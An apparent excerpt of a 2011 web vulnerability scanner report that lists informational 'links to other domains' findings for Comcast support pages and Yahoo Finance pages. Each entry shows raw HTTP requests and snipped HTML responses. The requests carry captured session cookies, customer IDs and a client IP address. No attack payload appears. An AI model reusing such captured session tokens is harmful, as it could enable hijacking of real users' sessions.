Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...

15.57. http://customer.comcast.com/Pages/FAQDisplay.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQDisplay.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Pages/FAQDisplay.aspx?Guid=eb1cdc34-2fa3-4cf6-8b00-32f1e4e30feb HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://customer.comcast.com/Pages/FAQViewer.aspx?Guid=2ac169ad-5420-475d-b1ef-5d5cf2224639
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; __utma=24577576.1274302.1315329902.1315329902.1315329902.1; __utmb=24577576.2.10.1315329902; __utmc=24577576; __utmz=24577576.1315329902.1.1.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=internet%20phone; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B%20SC_LINKS%3D%3B

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 34622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Overl
...[SNIP]...
<p><a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<li>Router Login:&nbsp;<a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://www.routerlogin.net">http://www.routerlogin.net</a>
...[SNIP]...
<br />
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1<br />
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://www.routerlogin.net">http://www.routerlogin.net</a>
...[SNIP]...
<br />
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<br />
<a target="_blank" href="http://ui.linksys.com/files/WRT310N/1.00.4/">http://ui.linksys.com/files/WRT310N/1.00.4/</a>
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://www.routerlogin.net ">http://www.routerlogin.net </a>
...[SNIP]...
<br />
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
</strong> icon on your desktop, open your Web browser and go to <a target="_blank" href="http://192.168.0.1 ">http://192.168.0.1 </a>
...[SNIP]...

15.58. http://customer.comcast.com/Pages/FAQViewer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Pages/FAQViewer.aspx?Guid=2ac169ad-5420-475d-b1ef-5d5cf2224639 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"pv":8,"lc":{"d0":{"v":8,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; mbox=session#1315327839174-766376#1315331762|PC#1315327839174-766376.19#1316539502|check#true#1315329962; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331702273%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ahow%2520do%2520i%2520know%2520which%2520xfinity%2520internet%25202go%2520service%2520is%2520best%2520for%2520me%253F%253A%2520faq%2520viewer%7C1315331702288%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=24577576.1274302.1315329902.1315329902.1315329902.1; __utmb=24577576.1.10.1315329902; __utmc=24577576; __utmz=24577576.1315329902.1.1.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=internet%20phone; bn_u=6923713561343025788; fsr.a=1315329904559

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script>
<script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?version=2" type="text/javascript"></script>
...[SNIP]...
<dt><a onclick="window.open('http://www.askcomcast.com/acv5.asp','_blank','height=465,width=495');return false;" href="http://www.askcomcast.com/acv5.asp">Ask Comcast</a>
...[SNIP]...
<dt><a target="_blank" href="http://www.comcastsupport.com/email">E-mail Us</a>
...[SNIP]...
<dt><a onclick="window.open('http://www.comcastsupport.com/redirects/chat/chathelpfp.asp','_blank','height=700,width=800,scrollbars=yes');return false;" href="http://www.comcastsupport.com/redirects/chat/chathelpfp.asp">Chat With Us</a>
...[SNIP]...
<p>If you are a current Comcast customer and you want to know the price of an extra cable box, <a target="_blank" href="http://www.comcastsupport.com/chat">chat with a Comcast representative</a>
...[SNIP]...

15.59. http://finance.yahoo.com/lookup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /lookup

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lookup?s=xss HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 64558

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Symbol Lookup from Yahoo! Finance</title>
<meta http-equiv="Content
...[SNIP]...
<meta name="keywords" content="symbol lookup, ticker lookup, stock symbol lookup">

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/reset-fonts-grids/2.0.0/mini/reset-fonts-grids.css&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/assets/skins/sam/2.0.0/mini/tabview.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_base.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/lookup.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_siab_lookup.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_topnav_base.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_topnav_theme.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_quotebar.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_footer_base.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_footer_theme.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yui_helper.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_symbol_suggest.css" />
</head>
...[SNIP]...
<div id="yfi_fp_hd">
<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
903/B=nYQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=6433971/R=2/SIG=13dr0chmn/*http://ad.doubleclick.net/jump/N6036.Yahoo.com/B5653524.6;abr=!ie4;abr=!ie5;sz=728x90;ord=1315313286327912?"><IMG SRC="http://ad.doubleclick.net/ad/N6036.Yahoo.com/B5653524.6;abr=!ie4;abr=!ie5;sz=728x90;ord=1315313286327912?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
<!--QYZ 705779051,;;FB2;2142000625;7;--><iframe style="padding:0px;margin:0px;" src="http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286327912?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15u7mhqkb/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=mIQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*" title="" border="0" frameBorder="0" scrolling="no" width="120" height="60"></iframe>
...[SNIP]...
<!-- APT Vendor: Doubleclick --><IFRAME SRC="http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15u84g3hn/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=l4Q4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286327912?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15u84g3hn/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=l4Q4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=2/X=3/*;ord=1315313286327912?"></SCRIPT>
...[SNIP]...
286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=0/X=3/SIG=13pqnd2jh/*http://ad.doubleclick.net/jump/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313286327912?"><IMG SRC="http://ad.doubleclick.net/ad/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313286327912?" BORDER=0 WIDTH=120 HEIGHT=60 ALT="Advertisement"></A>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script><noscript> <iframe src="http://adserver.teracent.net/tase/ad?AdBoxType=49&Partner=305&url=fidelity.yahoo.buttons&inv=yaptenc&taid=1298047689104&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&yud=smpv%3d3%26ed%3d5sKNhYzvryTNPuv3gspQXPvZcE4mLfW3Jn_37SuIx8txQGB3ozBXXtL8U2c-&rnd=1315313286327912&esc=0&rcu=http://global.ard.yahoo.com/SIG=15unbqkpj/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=mYQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=1/X=3/*" align="center" allowtransparency="true" frameborder="0" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="border:none;display:block;height:[REPLACE WITH HEIGHT]px;margin:0;padding:0;width:[REPLACE WITH WIDTH]px;" vspace="0"></iframe>
...[SNIP]...
<div id="yfi_fp_right">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?_PVID=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903&ad_type=iframe&ad_size=160x600&site=140440&section_code=14445074&cb=1315313286327912&promote_sizes=1&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15nufd2uu/M=787833.14445074.14291837.1414235/D=fin/S=2142000625:SKY/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=oIQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=6261160/R=0/*"></IFRAME>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yahoo-dom-event/2.0.0/mini/yahoo-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/element/2.0.0/mini/element-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/get/2.0.0/mini/get.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/2.0.0/mini/tabview-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/connection/2.0.0/mini/connection.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yui-min-3.2.0.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_common.js"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ff1cec(gid$PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903,st$1315313286274929,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.60. http://finance.yahoo.com/q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=&t=XSS.F; expires=Fri, 03 Sep 2021 05:48:15 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>XSS.F: S
...[SNIP]...
<link rel="canonical" href="http://finance.yahoo.com/q?s=XSS.F">
<link rel="stylesheet" href="http://l.yimg.com/bm/lib/fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_quote_summary_concat.css" type="text/css">
</head>
...[SNIP]...
<div id="yfi_hd"><script type='text/javascript' src='http://l.yimg.com/bm/lib/fi/common/p/d/static/js/2.0.188908/2.0.0/yui-min-3.2.0.js'></script><link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css' /><style>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<span id="yfs_pp0_^dji"><img width="10" height="14" border="0" src="http://l.yimg.com/a/i/us/fi/03rd/down_r.gif" alt="Down"> <b class="
yfi-price-change-down
">
...[SNIP]...
<noscript><link rel="stylesheet" type="text/css" href="http://l.yimg.com/bm/lib/fi/common/p/d/static/css/2.0.188908/2.0.0/yfi_nav_topnav_noscript.css"></noscript>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script><noscript> <iframe src="http://adserver.teracent.net/tase/ad?AdBoxType=49&Partner=305&url=fidelity.yahoo.buttons&inv=yaptenc&taid=1298047689104&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&yud=smpv%3d3%26ed%3d5sKNhYzvryTNPuv3gspQXPvZcE4mLfW3Jn_37SuIx8txQGB3ozBXXtL8U2c-&rnd=1315313295276686&esc=0&rcu=http://global.ard.yahoo.com/SIG=15s93v5fj/M=601846039.602985816.859733051.826566051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=DIEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=1/X=3/*" align="center" allowtransparency="true" frameborder="0" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="border:none;display:block;height:[REPLACE WITH HEIGHT]px;margin:0;padding:0;width:[REPLACE WITH WIDTH]px;" vspace="0"></iframe>
...[SNIP]...
<!-- APT Vendor: Doubleclick -->
<IFRAME SRC="http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15si3pdps/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=CoEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295276686?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15si3pdps/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=CoEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=2/X=3/*;ord=1315313295276686?"></SCRIPT>
...[SNIP]...
295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=0/X=3/SIG=13pvbri05/*http://ad.doubleclick.net/jump/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313295276686?"><IMG SRC="http://ad.doubleclick.net/ad/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313295276686?" BORDER=0 WIDTH=120 HEIGHT=60 ALT="Advertisement"></A>
...[SNIP]...
<span id="yfs_ad_n4FB2" ><iframe style="padding:0px;margin:0px;" src="http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295276686?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sf870iv/M=601843023.602979803.858295551.826566051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=C4EoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*" title="" border="0" frameBorder="0" scrolling="no" width="120" height="60"></iframe>
...[SNIP]...
<span class="fb-like-button"><iframe src="http://www.facebook.com/plugins/like.php?href=http://finance.yahoo.com%2Fq%3Fs%3DXSS.F&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21&amp;width=100&amp;locale=en_US" scrolling="no" frameborder="0" allowTransparency="true" style="height:21px; width:95px;"></iframe><a style="padding-top:4px; position:absolute;" href="http://help.yahoo.com/l/us/yahoo/finance/social/fitalikeit.html" title="What is a like button?"><img src="http://l.yimg.com/bm/lib/fi/common/p/d/static/images/2.0.188908/2.0.0/icon_help.gif" alt="What is a like button?"></a>
...[SNIP]...
<td align="right"><a target="_blank" class="CAN_link" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0OWRiZTdvMyhnaWQkdlliWG9VUERrampwQVJwalRsLndqUUtGTWhkN2FrNW1GbzhBQXI5XyxzdCQxMzE1MzEzMjk1MjE0ODE1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJDlyWkZPVVBEbjJvLSxjdCQyNSx5YngkXzBYYWFWLmFEYTZmYW8zQjc4UDA1USx3JDApKQ/2/*http://info.yahoo.com/relevantads/"><span class="can_ad_slug">
...[SNIP]...
<!-- APT Vendor: WSOD -->
